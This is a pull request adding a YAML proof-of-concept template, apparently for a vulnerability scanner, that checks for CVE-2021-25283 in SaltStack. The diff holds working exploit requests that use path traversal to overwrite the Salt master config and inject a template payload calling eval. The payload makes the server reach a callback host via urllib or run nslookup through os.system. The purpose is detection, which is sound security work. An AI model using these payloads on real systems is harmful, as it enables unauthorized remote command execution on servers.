### PR TITLE
saltstack-cve-2021-25283

### DIFF
--- a/pocs/saltstack-cve-2021-25283.yml
+++ b/pocs/saltstack-cve-2021-25283.yml
@@ -1,0 +1,39 @@
+name: poc-yaml-saltstack-cve-202125283
+set:
+  reverse: newReverse()
+  reversedomain: reverse.domain
+  reverseurl: reverse.url
+  reverseip: reverse.ip
+groups:
+  http:
+    - method: GET
+      path: /run
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.body.bcontains(b"wheel_async")
+    - method: POST
+      path: /run
+      headers:
+        Content-Type: application/json
+      body: |
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"urllib.request\\\").request.urlopen(\\\"{{reverseurl}}/saltstack/bug\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+      expression: |
+        response.status == 200 && reverse.wait(70)
+  dns:
+    - method: GET
+      path: /run
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.body.bcontains(b"wheel_async")
+    - method: POST
+      path: /run
+      headers:
+        Content-Type: application/json
+      body: |
+        [{"client":"wheel_async","fun":"pillar_roots.write","data":"rest_cherrypy:\n  port: 8000\n  host: 0.0.0.0\n  disable_ssl: true\nexternal_auth:\n  pam:\nmaster_uri: tcp://127.0.0.1:4505\npassword: sdb://aaaaa/bbbbb?name=1\naaaaa:\n  driver: rest\n  bbbbb:\n    url: \"{{name}}{{().__class__.__bases__[0].__subclasses__()[-2].__init__.__globals__['__builtins__']['eval']('__import__(\\\"os\\\").system(\\\"nslookup {{reversedomain}} {{reverseip}}\\\")')}}\"","path":"../../../../../etc/salt/master","token":"132132131213"}]
+      expression: |
+        response.status == 200 && reverse.wait(70)
+detail:
+  author: kkkbbb(https://github.com/kkkbbb)
+  links:
+    - https://mp.weixin.qq.com/s/-Kbl0rxxDmx2srceSN_IIA


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
CVE-2021-25283 Saltstack 可在未授权的情况下任意命令执行
https://mp.weixin.qq.com/s/-Kbl0rxxDmx2srceSN_IIA
 ##测试环境
vulhub https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
![image](https://user-images.githubusercontent.com/18513551/110906358-cde1aa80-8346-11eb-9218-489f909f349d.png)
![image](https://user-images.githubusercontent.com/18513551/110906477-f49fe100-8346-11eb-8e28-54be58ba8f4d.png)

